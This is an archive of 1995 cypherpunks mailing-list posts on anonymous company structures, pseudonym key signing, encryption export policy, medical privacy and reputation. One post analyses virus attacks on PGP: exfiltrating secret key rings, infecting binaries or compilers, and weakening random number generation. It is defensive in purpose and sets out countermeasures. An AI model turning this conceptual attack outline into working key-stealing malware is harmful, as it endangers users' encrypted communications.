> trustworthy and non-anon jurisdiction, couldn't these foreign anon companies 
> do the same in the present system and therefore make it very hard to know 
> if any company in any country is non-anon?

Yes. But you have to have your base anon corporation to be the penultimate
stockholder of the other corporations. And it can be expensive - perhaps too
expensive to be worth the gain in anonymity. There is also the matter of having
to have human directors with revealed True Names in most non-anon and
"trustworthy" jurisdictions.

There are other ways to anonymise corporations - I presented a proposal to the
list about a year ago that simply interposed a unit-like trust as sole (legal)
shareholder of the corporation, the "units" in the trust mirroring the shares
but being held anonymously.

Any of these structures can/might be useful. What I like about unincorporated
companies, however, is the way they rely only on the common law and equity,
and bypass statute - enabling, perhaps, less reliance upon the law of any
particular State.

> I'm not completely sure I understood your explanation of a 
> deed-of-settlement corp. and the idea of an "unincorporated" company. 
                     ^^^^^
Not "corporation", "company", as in collective noun :-) An incorported company
is a corporation, but in general, company ~= corporation. It is just that for
well over a hundred years there have not been any companies that have _not_
been incorporated, except dance companies, infantry companies etc.
   
> (Unincorporated in what way, and what were the registration and ID 
> requirements?)

Unincorporated in every way :-) Which is to say, not a seperate legal entity
but a partnership (of shareholders) coupled with a trust of the partnership
assets.

And because it relies only on partnership/agency/contract law and the law of
trusts, there were no registration or ID requirements, just as there are no
registration or ID requirements for forming a partnership or trust now.
 
(Compare, for instance, the requirement on NZ incorporated companies to keep
public records of the name and [in the case of natural persons, residential]
address of everyone who has been a shareholder in the last ten years.)

> Any references? Thanks.

A lot of Corporate/Company law books have some coverage of this stuff in their
historical chapters - try English or Australian texts (Gower is quite good).
Legal history texts also often have something. Du Bois published a book (in
the 1940's ?) that seems to be cited for all manner of minutiae - it has
something about the Bubble Act in its (long) title. [If you find this book,
how about sending me a summary :-) Chapter III is probably most useful.] And
J. Reeder "Corporate Loan Financing in the 17th and 18th Centuries" (1973) 2 Anglo-American Law Review 487 is supposed to have something about bond issues
by unincorporated companies (or is it bank lending?).

Cheers,

Dm.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLBKhllo3j8JHzalAQF/PQP7BWH7JGNNazI2ehSpOldEysa+FZbirHLs
hkbqOIFDJzBXtQ3lyiA1lZydMdDTxpNAF0oGveNosX6Sw3l23Hu/j+EGg7hOGLq3
IVchirf24/puj6HWwQbD9LlMB1SARNKkwG+0NI6saYz/z0JVHdtw7c6/dvoxcVZX
M/T8qjWddqs=
=wLPd
-----END PGP SIGNATURE-----

[Palmtop News Reader - Beta Version 3]





From stewarts at ix.netcom.com  Mon Nov 20 12:07:29 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Tue, 21 Nov 1995 04:07:29 +0800
Subject: [NON-LIST] Re: reputations: discussions and meta-discussions
Message-ID: <199511200819.AAA22823@ix12.ix.netcom.com>


(This really should be in private mail; keyid D072FC19 (still unnamed) 
can reach me using anon.penet.fi or alpha.c2.org or a reply-block
remailer to get replies....   Or if you prefer, send me one-way remail
and I'll post replies in alt.anonymous.messages.)

At 02:17 AM 11/19/95 -0800, - keyid D072FC19 (still unnamed) wrote:

>On Sat, 18 Nov 1995, Bill Stewart wrote: 
>> Here's the new entity's key, signed :-)  I haven't added it to the
>> PGP key servers; I'll leave that up to you...
>
>As we know, a public key certificate is a binding between the key and
>some attribute, as asserted by the signer.  In this case you have asserted
>a binding between my key and the string "a new entity, as yet unnamed".
>I don't understand why you did this.  Would you please explain?
>The only reason I can think of is that you wanted to provide evidence
>for the key's creation date by timestamping it.  If that was the case,
>I thank you.  But in the future, to avoid confusion, perhaps you can 
>create a new ID "timestamp" for the key and sign that instead.

Are you asking why I used the string "a new entity, as yet unnamed",
or why I certified it?  If the former, it's because when I loaded the
PGP key block into my public key file, that's who it said it was,
and it matched the name in your cypherpunks posting.

If you're asking why I certified a key used by a nym, I started doing that
a couple months ago, as an experiment about what it means to certify keys
and how to provide better continuity for keys used by nyms, and signing
yours seemed like an appropriate thing to do (since you chose to name
your key as belonging to the same string you signed your message with.)
I have the policy of only signing one key for a given namestring with the key
I use for signing nyms, so it gives a certain evidence of uniqueness as well as 
the timestamping effect.

Since you also commented on cluttering up namespace, I didn't send the key
to the keyserver myself; that's up to you.

Has it been a wildly successful experiment?  Well, no :-)  But I've at least
had to think about some of the issues more, and a couple of people have gotten
their nym keys signed.





#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281







From frantz at netcom.com  Mon Nov 20 12:09:53 1995
From: frantz at netcom.com (Bill Frantz)
Date: Tue, 21 Nov 1995 04:09:53 +0800
Subject: Virus attacks on PGP
Message-ID: <199511201945.LAA27486@netcom10.netcom.com>


PGP can be vulnerable to virus attacks.  (Similar attacks can be made on
other cipher systems.) These virus attacks can either be "Get the Key", or
"Subvert the System" attacks.  Schneier's "Rubber Hose" attack and a class
of attack which I will call "Black Bag" attacks are get the key attacks. 
With a black bag attack, victims do not know their keys have been stolen,
and so continue to use them.  (According to "The Puzzle Palace", NSA got
the FBI to perform black bag attacks on embassies in Washington DC.)  I
don't think subvert the system attacks have any parallel in classical
cryptography.


Get the Key Attacks

PGP has three keys: the secret key ring pass phrase, the secret RSA key,
and the IDEA key.  Getting any of them would constitute a successful
attack.

A virus that collects secret key rings and sends their contents somewhere,
either via UDP like messages or by dialing the modem late at night doesn't
seem to much harder to build than one that erases your hard disk.  If it
runs only once per machine, its chances of getting caught are fairly low. 
The standard IP error handling of "throw away the packet" means that it
probably won't be caught by firewalls.  It seems more likely that someone
will catch their computer making an unauthorized 800 number call.  This
attack would allow an opponent to use a brute force attack on the pass
phrase.

Getting the pass phrase or the IDEA key requires that the virus infect
something in the PGP environment.  The infection could be to PGP itself, or
to the operating system in which it runs.  (N.B. Since Mac and PC systems
have only one protection domain, all programs running in them are part of
the operating system for the sake of this analysis.)

Assuming PGP is infected, although similar arguments apply to the operating
system, the possible mechanisms of infection are many:

  A infected PGP binary is installed
  A virus modifies disk copies of PGP
  The OS's loader is infected to modify PGP as it is loaded
  The compiler or linker is infected to modify PGP.

Any of these forms of infection could send pass phrases, secret keys, or
IDEA keys out via IP or modem.


Subvert the System Attacks

The mechanisms of infection are similar to those of the get the key
attacks, but these attacks do not require that the virus send data outside
the machine.  Instead, these attacks act by reducing the size of one of the
three key spaces, making it vulnerable to brute force attacks.  For
example, if the OS provides a "random number" service, then limiting the
randomness of the numbers constitutes an attack.  Making RSA key generation
loosely connected to the date and time constitutes an attack.


Defenses

One standard defense in classical cryptography is to frequently change the
cipher keys.  The PGP web-of-trust makes changing keys difficult, and is
perhaps the weakest part of the overall protocol.

Standard defenses against viruses can help, but if the attacker is
determined and competent, then the virus will not be detected by virus
detection programs, and will not have bugs which cause noticeable ill
effects on infected machines.

Custom changes to things like random number utilities and the PGP code
itself may increase resistance by preventing some of these attacks from
identifying the modified code as its intended target.

Auditing code, preferably object code, can detect infection.  Having ALL
the source code available is almost a requirement here.

Maintaining a file of cryptographic hashs of the IDEA keys used and
checking for duplicates can detect subvert the system attacks on IDEA key
generation at the risk that the cryptographic hash is in fact invertible
and can be used to reveal the IDEA key.

Using operating systems which run in many small protection domains can
limit the opportunity for infection.  One such system I have been involved
with for over 20 years is described at the following WEB sites:
  http://www.cis.upenn.edu/~KeyKOS/
  http://www.webcom.com/agorics/allkey.html

Bill


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz at netcom.com             Los Gatos, CA 95032, USA







From llurch at networking.stanford.edu  Mon Nov 20 12:15:25 1995
From: llurch at networking.stanford.edu (Rich Graves)
Date: Tue, 21 Nov 1995 04:15:25 +0800
Subject: "Junk Email"
Message-ID: <Pine.ULT.3.91.951120112600.17877G-100000@Networking.Stanford.EDU>


See http://www.valleynet.net/hypermail/html/

Hurry, they might turn it off.

ROTFL

-rich





From hroller at c2.org  Mon Nov 20 12:45:06 1995
From: hroller at c2.org (Hroller Anonymous Remailer)
Date: Tue, 21 Nov 1995 04:45:06 +0800
Subject: No Subject
Message-ID: <199511202005.MAA25006@infinity.c2.org>


The other anonymous poster was referring to Detweiler's
belief that cryptoanarchy was a budding Nazism as one
of his apparent motivations. After a little bit of 
amateur Detweiler study I can agree with this. 

His page at http://www.csn.net/~ldetweil/ has sections that
emphasize his concern about cryptoanarchy as a kind of
"neo-nazism". Thankfully the cryptoanarchist sentiments
on this list are much different than nazism in the way
it advocates complete disengagement from the political
process, something that tended to make the Nazist agenda
highly dangerous. Without that you just have a bunch of
subversive guerillas. Like gnats, irritating but irrelevant.

So as long as we stick with the non-political advocation,
and stay disorganized, and don't ever amount to anything
significant as far as visible political clout, I think
Detweiler is generally going to continue to leave us alone,
thank God.







From anon-remailer at utopia.hacktic.nl  Mon Nov 20 12:45:51 1995
From: anon-remailer at utopia.hacktic.nl (Name Withheld by Request)
Date: Tue, 21 Nov 1995 04:45:51 +0800
Subject: Spam the Sign!
Message-ID: <199511202020.VAA01688@utopia.hacktic.nl>


On September 27, Jeff Weinstein of Netscape (and others) wrote:

> > > ... would be nice if we could get 128 bit keys, though ... (hint,
> > > hint).
> > 
> > We are working this issue with the government.  As soon as we can
> > make it available for download we will.

> In other words, we will never see it in our lifetimes -- the
> bureaucreeps aren't known for promoting the spread of strong crypto.

>>  Where did I imply that if the govt. ignored us or said no that we
>>  would meekly go away with tail between legs?

Netscape has a cute little Times Square scrolling sign in their engineering
dept. - you can leave a message for all to see at:

	www.netscape.com/people/mtoy/sign/index.html

Drop by and ask Jeff where his tail is these days. };->





From JWRCLUM at aol.com  Mon Nov 20 12:49:03 1995
From: JWRCLUM at aol.com (JWRCLUM at aol.com)
Date: Tue, 21 Nov 1995 04:49:03 +0800
Subject: Privacy Rights Alert
Message-ID: <951120150426_28561669@emout06.mail.aol.com>


    From:  American Civil Liberties Union of Massachusetts
           jwrclum at aol.com
 
    Re:    Privacy Rights Alert
    
    Date: November 20, 1995
    
    c 1995 ACLUMA
    
         We at the American Civil Liberties Union of Massachusetts want to
alert you to the fact that the right to medical privacy of all Americans is
imperiled by a bill just introduced in the U.S. Congress.  This bill, which
is claimed to be a  "Medical Records Confidentiality Act,"  in reality may
turn out to be profoundly destructive of your right to privacy. 
         Although Part I does contain certain aspects which     could help
privacy, Part II undercuts the very fabric of patient- doctor
confidentiality.  
         First, it preempts many state law and common law  protections which
currently exist.  
         Second, it pushes the further computerization of medical records,
and will bring about the creation of "Health Information Services"  ---
corporate entities which would receive, process, and serve as libraries for
actual on-line medical records forwarded from hospitals, clinics, and
individual doctors.  It appears that this will take place without any
requirement for individual patients' authorization or consent.
         As we all know, computerized data bases are not immune     from
being accessed by both unauthorized  "outsiders"  and   unauthorized
"insiders."   Centralization of data storage,   especially in electronic
form, simplifies its being accessed.
         But aside from that, the bill would actually authorize
access to the medical records in these data bases by a host     of government
and non-government entities.  Each of our medical records would thus become
part of a computerized "lending library"  --- an internet of medical records.
         For example, the bill would permit release of your medical records
from "Health Information Services" (the on-line data base holders) and
"Health Information 'Trustees'" (providers, hospitals, health plans,
employers, insurers, and health oversight agencies) to the following (among
others):
              - Release to researchers (along with your medical
history, it is possible that identifying
                information including your name, address, and 
                phone number would be sent).
              - Nearly-automatic release, to the opposing party 
                in a lawsuit, of your entire medical history, if
                your health, physical or mental, has been raised 
                by you as an issue in that lawsuit.
              - Release to law-enforcement authorities under
certain circumstances.
              - Release to Public Health Agencies under certain
                circumstances.
              - Release based on Judicial Warrant --- you would
be notified by mail within 30 days after                         execution of
the warrant (90 days or more with 
                the government's ex parte option).
              - Release based on Judicial Subpoena, Grand Jury
Subpoena, or Administrative Agency (e.g. Social                  Security)
Subpoena --- you would be notified on        or before the date of its
execution (or within
                90 days thereafter [or longer] with the
government's ex parte option).
                          -A special variant of this, where the
identity of the patient is "unknown," would                      allow the
search of records (plural) in           order to identify the person being
sought.        [In essence, this would allow "fishing"   expeditions, using a
computerized net, into
                      the private lives of Americans.]

         In some of these situations, you, the patient, will
only be informed after the records have been released.
         You may, in some circumstances, have the legal right to
"attempt to quash" the subpoena (etc.) by seeking a court's
intervention.  However, the standard by which the court is
to reach a decision on this will be mandated by this bill to
be a consideration of whether the government's interest in obtaining the
information outweighs the privacy interest of the individual.
         We would encourage you to pull up a copy of the actual
bill and view it yourself.  This can be done through the
Library of Congress internet site at http:\\thomas.loc.gov
(104th Congress,  Senate bill number  S 1360 ).
         Alternatively, a hard copy by mail can be requested
from the U.S. Senate Documents Room, by faxing to 202-228-2815 
a note containing the bill number and your mailing address.
         All our voices need to be heard in order to help make
certain that this bill is not passed by Congress.  
         Possible actions include: (1) Letters to your Senators and
congresspersons, and to the House and Senate leadership.
(2) Letters to local newspapers and other media.  (3) Forwarding the contents
of this message to places where you feel it will be
of interest and have impact.
         This document may be re-distributed freely, provided it remains in
its entirety.
         If you value your right to privacy, the time to act is now....  
    





From rah at shipwright.com  Mon Nov 20 14:29:22 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Tue, 21 Nov 1995 06:29:22 +0800
Subject: "Dear Newt" Letter...
Message-ID: <v02120d0facd69dc27ec3@[199.0.65.105]>



My, *this* looks interesting...


Cheers,
Bob Hettinga



--- begin forwarded text

Date: 20 Nov 1995 11:21:01 -0800
Subject: please fwd to cpunks if you
To: "Bob Hettinga" <RAH at shipwright.com>

     The Ad Hoc Taxpayer Coalition for Computer Privacy

                     November 8, 1995

The Honorable Newt Gingrich
Speaker of the House of Representatives
H-232 The Capitol
Washington, DC 20515-6502

Dear Mr. Speaker:

 We are writing to express serious concerns about the
Administration's efforts to continue to restrict the ability
of computer users at home and abroad to protect their personal
and private information over electronic networks through the
use of encryption technology. The Administration seems
determined to ensure government surveillance of all electronic
information and communications. It began with President
Clinton's "Clipper Chip," but has not stopped.

 Consumers aren't happy with these proposals, and neither is
the business community nor civil libertarians. In fact, it's
hard to find anyone supportive outside the Administration
except for the few that would benefit from the
Administration's "proposed relaxation" of the nation's export
policy.

 The Administration refuses to let American computer hardware
and software companies sell products with good encryption
worldwide unless the U.S. Government is guaranteed access to a
key that unlocks that information. The Administration is
trying to leverage these companies' need to export -- they
derive more than half their earnings from sales abroad -- and
desire to develop a single product worldwide, to force them to
include a feature in products they sell in the U.S. and abroad
that will allow government access. Administration officials
also have said that if American companies do not "voluntarily"
include such a feature, then they will seek legislation making
such a feature mandatory.

 The Administration's approach is the wrong policy for today's
marketplace.

 It's anti-consumer. Computer users will not entrust their
sensitive information to computer networks unless its security
and privacy are assured. Without good privacy protection,
there simply will not be a Global Information Infrastructure
-- and America won't be in the lead.

 It's anti-marketplace. There is no consumer demand for
encryption products that give the government easy access. The
Administration has come forward with a typical big-government
approach -- a government designed solution for a government
problem. This completely overlooks the realities of a
free-market.

 It is anti-American business. The Administration's current
policies are seriously harming the continued competitiveness
of one of our fastest growing and most successful industries
-- the computer hardware and software industry. Computer users
are demanding good encryption but American companies are not
allowed to supply it. Yet there are hundreds of foreign
encryption products manufactured and encryption programs are
widely available on the Internet.

 Finally, it is anti-progress. Wishing that there was no
encryption available will not make it so. The technology is
widely understood and available -- you can't put this genie
basic in the bottle. Government policies should not encumber
the American computing industry as it leads the world
technology revolution.

 We strongly urge you to oppose attempts to limit the ability
of Americans to use whatever encryption they wish and to
support the immediate relaxation of harmful export controls on
American products and programs with encryption features.


     The Ad Hoc Taxpayer Coalition for Computer Privacy

Americans for Tax Reform
Association of Concerned Taxpayers
Competitive Enterprise Institute
Citizens for a Sound Economy
The Business Leadership Council
The Small Business Survival Committee
Citizens Against a National Sales Tax/VAT

Virginia Postrel, Editor, Reason magazine
Sheldon Richman, Senior Editor, The Cato Institute
Tanya Metaksa, Executive Director, Institute for Legislative
 Action, National Rifle Association
Kellyanne Fitzpatrick, The Polling Company
Donna Matias, Institute for Justice

=+=+=+=+
This information is provided as a service of the National Rifle
Association Institute for Legislative Action, Fairfax, VA.

This and other information on the Second Amendment and the NRA is
available at any of the following URL's: http://WWW.NRA.Org,
gopher://GOPHER.NRA.Org, wais://WAIS.NRA.Org, ftp://FTP.NRA.Org,
mailto:LISTPROC at NRA.Org (Send the word help as the body of a message)

Information may also be obtained by connecting directly to the
NRA-ILA GUN-TALK Bulletin Board System at (703) 934-2121.

--- end forwarded text


-----------------
Robert Hettinga (rah at shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf at clark.net  http://www.netresponse.com/zldf <<<<<







From hallam at w3.org  Mon Nov 20 14:45:58 1995
From: hallam at w3.org (hallam at w3.org)
Date: Tue, 21 Nov 1995 06:45:58 +0800
Subject: No Privacy Right in Indonesia ?
In-Reply-To: <Pine.BSD.3.91.951117175152.9898M-100000@ahcbsd1.ovnet.com>
Message-ID: <9511202205.AA28370@zorch.w3.org>



>An 11 17 95 Reuter Information Service newsstory headlined 
> 
>     Politics, not sex, is Indonesian Internet's concern 

Absolutely. We designed it this way. One of the key ideas was to provide such 
governments with a choice between having their power structures erroded by 
democratic influences or to sink into technological obsolecence.

The US govt. stands to do best from all this. Democratic govt.s in general
will win. Those that will lose are those which attempt to stamp a political 
or cultural orthodoxy on their people. 

Communication is the greatest threat to tyranny. That is why all tyrannies 
must control communications. It is worth considering that when Stalin died
he was considered the saviour of the country, even by those who should have
known the truth. It was only afte Kruschev's speech to the closed session
that the truth became known inside the party. Note that even those who were
the victims of the oppression had believed that Stalin was a hero. "It is
a mistake", "if only Stalin knew" yet Stalin knew all along and this was 
obvious to the outside observer.

East Germany fell when the size of the defections became known within the 
country. It was clear that the regime was bankrupt and that people were
voting with their feet. 

Cuba will not be brought down by sanctions, that policy has failed for
thirty years and shows no signs of achieving anything. On the other hand
the communist structures would probably be sewpt away in months were the US
to admit defeat (thus acknowledging the Cuban peoples "victory") and start 
package tourist flights. Once it was in the interests of the nomenclatura
to become capitalists they would change.

South Africa was not brought down by sanctions per se, they had an
effect because they demonstrated that the Western world did not accept
the appartheid principles. South Africa tried to see itself as a part
of the West and that was crucial to the apartheid mindset. Sanctions
demonstrated that South Africa was not considered a friend or aly. 


		Phill
 





From fc at all.net  Mon Nov 20 15:08:24 1995
From: fc at all.net (Dr. Frederick B. Cohen)
Date: Tue, 21 Nov 1995 07:08:24 +0800
Subject: "Dear Newt" Letter...
In-Reply-To: <v02120d0facd69dc27ec3@[199.0.65.105]>
Message-ID: <9511202228.AA16586@all.net>


*** FLAME ON ***

Quoted in complete context for your protection:
> --- begin forwarded text
> 
> Date: 20 Nov 1995 11:21:01 -0800
> Subject: please fwd to cpunks if you
> To: "Bob Hettinga" <RAH at shipwright.com>
> 
>      The Ad Hoc Taxpayer Coalition for Computer Privacy
> 
>                      November 8, 1995
> 
> The Honorable Newt Gingrich
> Speaker of the House of Representatives
> H-232 The Capitol
> Washington, DC 20515-6502
> 
> Dear Mr. Speaker:
> 
>  We are writing to express serious concerns about the
> Administration's efforts to continue to restrict the ability
> of computer users at home and abroad to protect their personal
> and private information over electronic networks through the
> use of encryption technology. The Administration seems
> determined to ensure government surveillance of all electronic
> information and communications. It began with President
> Clinton's "Clipper Chip," but has not stopped.

Whoa!  Clinton didn't start the Clipper initiative.  Try Ragan/Bush!

Administration's efforts - hardly.  They inherited and mostly agreed

computer users at home and abroad - not according to what I've seen and
read - they want to stop export of good crypto, not internal use thereof.
It's the FBI that wants to read all your email and tap your phones.  The
administration is just going along as far as I can tell, and so is Newt.

>  Consumers aren't happy with these proposals, and neither is
> the business community nor civil libertarians. In fact, it's
> hard to find anyone supportive outside the Administration
> except for the few that would benefit from the
> Administration's "proposed relaxation" of the nation's export
> policy.

The vast majority of consumers don't care as far as I can tell.  Same
with most of the small business community (the vast majority of the
whole business community in the US).

>  The Administration refuses to let American computer hardware
> and software companies sell products with good encryption
> worldwide unless the U.S. Government is guaranteed access to a
> key that unlocks that information.

Dead flat wrong.  What is required is an export license, and they are
attainable.

> The Administration is
> trying to leverage these companies' need to export -- they
> derive more than half their earnings from sales abroad -- and
> desire to develop a single product worldwide, to force them to
> include a feature in products they sell in the U.S. and abroad
> that will allow government access.

What's your basis for this conclusion? They have not said so as far as I
can tell. 

> Administration officials
> also have said that if American companies do not "voluntarily"
> include such a feature, then they will seek legislation making
> such a feature mandatory.

Which ones said exactly what?

>  The Administration's approach is the wrong policy for today's
> marketplace.

Finally something I agree on.

>  It's anti-consumer. Computer users will not entrust their
> sensitive information to computer networks unless its security
> and privacy are assured. Without good privacy protection,
> there simply will not be a Global Information Infrastructure
> -- and America won't be in the lead.

I don't think most consumers care at all unless and until it directly
affects them in a way they can see and understand the connection with. 
There already is a GII, America is in the lead in some areas, and the
privacy issue is not a very important one judging by the vast majority
of users who use it regardless of and in ignorance of privacy protection.

>  It's anti-marketplace. There is no consumer demand for
> encryption products that give the government easy access. The
> Administration has come forward with a typical big-government
> approach -- a government designed solution for a government
> problem. This completely overlooks the realities of a
> free-market.

There is almost no consumer demand for encryption.  The demand that
exists is primarily business and government, and the government side
seems to think Clipper is a good idea.

>  It is anti-American business. The Administration's current
> policies are seriously harming the continued competitiveness
> of one of our fastest growing and most successful industries
> -- the computer hardware and software industry. Computer users
> are demanding good encryption but American companies are not
> allowed to supply it. Yet there are hundreds of foreign
> encryption products manufactured and encryption programs are
> widely available on the Internet.

It's not as good for American business as it could be, but Clipper might
be very good for American businesses currently being attacked by foreign
interests.  These hundred of foreign encryption products may contain the
same sorts of holes you fear in US products.  Your proposal might be
even worse for the US. 

>  Finally, it is anti-progress. Wishing that there was no
> encryption available will not make it so. The technology is
> widely understood and available -- you can't put this genie
> basic in the bottle. Government policies should not encumber
> the American computing industry as it leads the world
> technology revolution.

History does not agree with you.  Progress has not histoprically been
generated by the availability of encryption.  It may be in the future,
but for now your claim seems unsupported to me.

>  We strongly urge you to oppose attempts to limit the ability
> of Americans to use whatever encryption they wish and to
> support the immediate relaxation of harmful export controls on
> American products and programs with encryption features.

I believe Newt is in favor of clipper and national defense and law
enforcement, all of which strongly support CLipper, wire tapping, etc. 

>      The Ad Hoc Taxpayer Coalition for Computer Privacy
> 
> Americans for Tax Reform
> Association of Concerned Taxpayers
> Competitive Enterprise Institute
> Citizens for a Sound Economy
> The Business Leadership Council
> The Small Business Survival Committee
> Citizens Against a National Sales Tax/VAT
> 
> Virginia Postrel, Editor, Reason magazine
> Sheldon Richman, Senior Editor, The Cato Institute
> Tanya Metaksa, Executive Director, Institute for Legislative
>  Action, National Rifle Association
> Kellyanne Fitzpatrick, The Polling Company
> Donna Matias, Institute for Justice
> 
> =+=+=+=+
> This information is provided as a service of the National Rifle
> Association Institute for Legislative Action, Fairfax, VA.
> 
> This and other information on the Second Amendment and the NRA is
> available at any of the following URL's: http://WWW.NRA.Org,
> gopher://GOPHER.NRA.Org, wais://WAIS.NRA.Org, ftp://FTP.NRA.Org,
> mailto:LISTPROC at NRA.Org (Send the word help as the body of a message)
> 
> Information may also be obtained by connecting directly to the
> NRA-ILA GUN-TALK Bulletin Board System at (703) 934-2121.
> 
> --- end forwarded text
> 
> 
> -----------------
> Robert Hettinga (rah at shipwright.com)
> e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
> "Reality is not optional." --Thomas Sowell
> The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
> >>>>Phree Phil: Email: zldf at clark.net  http://www.netresponse.com/zldf <<<<<

If the NRA has all that cash, why don't they support a much better
letter to Newt that is well supported by facts and has enough punch to
really sway him?

-- 
-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236





From jimbell at pacifier.com  Mon Nov 20 15:12:26 1995
From: jimbell at pacifier.com (jim bell)
Date: Tue, 21 Nov 1995 07:12:26 +0800
Subject: Spam the Sign!
Message-ID: <m0tHeeN-0008zTC@pacifier.com>


>On September 27, Jeff Weinstein of Netscape (and others) wrote:
>
>> > > ... would be nice if we could get 128 bit keys, though ... (hint,
>> > > hint).
>> > 
>> > We are working this issue with the government.  As soon as we can
>> > make it available for download we will.
>
>> In other words, we will never see it in our lifetimes -- the
>> bureaucreeps aren't known for promoting the spread of strong crypto.
>
>>>  Where did I imply that if the govt. ignored us or said no that we
>>>  would meekly go away with tail between legs?


Here's a question:  Why can't Netscape be released WITHIN THE US with 128
bit keys?  Admittedly, it would probably...uh...escape within a few hours,
but that's no worse than what other cryptosystems (best-known example, PGP)
have done.






From hfinney at shell.portal.com  Mon Nov 20 15:38:23 1995
From: hfinney at shell.portal.com (Hal)
Date: Tue, 21 Nov 1995 07:38:23 +0800
Subject: Anonymity and Intellectual Capital
Message-ID: <199511202231.OAA11611@jobe.shell.portal.com>


The analogy between corporations protecting physical capital and
anonymity protecting intellectual capital is interesting, and I will
write a bit about it here.  I don't think it quite works in all ways but
it does suggest some ideas.

Capital, as I use the word, means stuff which helps you be productive.
Money can be physical capital, as can machines, computers, and so on,
but generally not consumer goods.  Traditionally, intellectual capital
by the same definition refers to training, knowledge, experience,
education - those mental skills and characteristics which help you
produce.  We have sometimes extended this notion here to reputation
capital, which we often use just to mean your reputation itself, your
good name.  But if we are going to call it "capital" it should really
be those aspects of your reputation which lead to productivity.  To the
extent that your good reputation helps you accomplish your productive
goals, it can be considered capital.  Particularly if you are a manager
or performer in some other position where people's opinions of you make
a big difference in how much you get done, you have a lot of reputation
capital.  Business reputations have many of the characteristics of
capital, too.

For some uses of anonymity it does make sense to think of them as
protecting reputation capital.  If you are going to send a message which
carries a risk of harming your reputation, perhaps because it is terribly
stupid or harsh, then anonymity can protect you in that way.  I think
some people do communicate anonymously for this reason.  However there is
another motivation, too, and that is fear of physical consequences.  Some
anonymous messages might lead to lawsuits or retribution in other forms,
such as firing or blackballing.  There is more involved in these cases
than just loss of reputation capital.  Physical capital is involved as
well.  So this is one way in which I think the analogy does not work.

Another difference relates to the number of people involved.  As I
understand it, the motivation for the corporate veil of immunity from
liability is so that people can safely band together in business.  If
there were no veil, and one harmful act by a member of the corporation
could result in any stockholder being held liable, then few people would
be willing to commit their assets to such an activity.  The risk would be
too great.  The point is that this protection is oriented towards
protecting large numbers of people.  It does not make much sense for a
single person to incorporate in order to try to protect himself from his
own harmful acts, and in fact I understand that the veil can often be
easily pierced in such situations.

On the other hand, with anonymity we are generally dealing with single
individuals.  There is no apparent need for people to pool reputation
capital in an endeavor, and have it be protected by the use of
anonymity.  The closest I can think of would be for a bunch of highly
regarded individuals to announce that they were going to join together
and create commentaries which would demonstrate all the insight, wit,
and other traits which gave these people such a high reputation in the
first place, but that the resulting missives would be released
anonymously, so that if one of them ended up reflecting badly on the
writers, there would be no way to know who had actually created it (it
could be a fake created by an imitator).

While I can't rule this out, it doesn't seem like a likely scenario, and
it doesn't seem to offer the opportunities that corporations do for
increasing productivity.

Another issue is the different forms of anonymity, which don't have clear
analogies with physical capital.  Using a pseudonym you can build up
reputation capital (or at least reputation) in the nym, but then you no
longer have immunity from harm if it commits some gaffe.  (Actually I
suppose this is not too different from the corporation whose assets can
be attacked but not those of the shareholders.)

Then there are the limited pseudonyms discussed by David Chaum, where
there are limits in how many pseudonyms of a particular type a person
can create.  You could have one "committed" pseudonym, unlinkable to
your True Name, which you post under; but you'd only get that one.
(You could post under other pseudonyms but they wouldn't be able to get
that "committed" stamp.) You'd have to be pretty careful what you say
via that nym, much as you are today with your True Name (which BTW a
lot of people don't realize yet).  Then people could filter so they
only received messages from committed nyms, figuring that senders would
be more likely to put meaningful content into these kinds of messages.

Chaum's system of credentials also could allow you to transfer
endorsements from one pseudonym to another.  We have discussed the idea
that such endorsements could be considered an embodiment of reputation
capital.  You could post a wide range of messages under different
pseudonyms, collect the positive endorsements (and discard the negative
ones), and attach them to your True Name or committed nym.  This might
encourage people to abandon their natural caution in making postings
which will come back to haunt them years hence (again, this will be more
an issue once people realize that this will happen).

Hal





From rwizard at mindspring.com  Mon Nov 20 15:40:22 1995
From: rwizard at mindspring.com (rwizard at mindspring.com)
Date: Tue, 21 Nov 1995 07:40:22 +0800
Subject: "Dear Newt" Letter...
Message-ID: <199511202232.RAA28111@borg.mindspring.com>


At 04:38 PM 11/20/95 -0500, Robert Hettinga wrote:
>
>My, *this* looks interesting...
>
>
>Cheers,
>Bob Hettinga
...
>Dear Mr. Speaker:
>
> We are writing to express serious concerns about the
>Administration's efforts to continue to restrict the ability
>of computer users at home and abroad to protect their personal
>and private information over electronic networks through the
>use of encryption technology. The Administration seems
...

As a constituent and campaign volunteer of Mr. Newt, I think
I will drop a hard copy of this off at his office along with a
healthy dose of *my* views !

Thanks for posting it. 

rwizard at mindspring.com
=================================================
"The Internet is already full - Go Away !"
=================================================
-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzChH30AAAEEAL4nhMMmeqVZXx2UYZgyZfjgm+oVkbLkVhgr7Z8rBPWd1FwX
wv+vQlX7smRbYF+FymeUKlWiKl8hhkueo5iObyek5C32a5NP0snYQYJDfwn9UE6P
hJGBpYcjiKU8XzUXfpfAC95FGkCqrLCp1kfDhLpqJChUK1GN8Va+auujevB9AAUT
tCVSYW5keSBXaWxzb24gPHJ3aXphcmRAbWluZHNwcmluZy5jb20+
=KccN
- -----END PGP PUBLIC KEY BLOCK-----

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMKl1wVa+auujevB9AQGJJwQAs9Y13pi2Rq5vFKc9RRIfed7Qkx63RFpz
J1AhkBLE+HEixfjhx3WEmg5hAloae8N2N7/gpPXs3i/TcOQ/XMXtd9L4SSlGieIJ
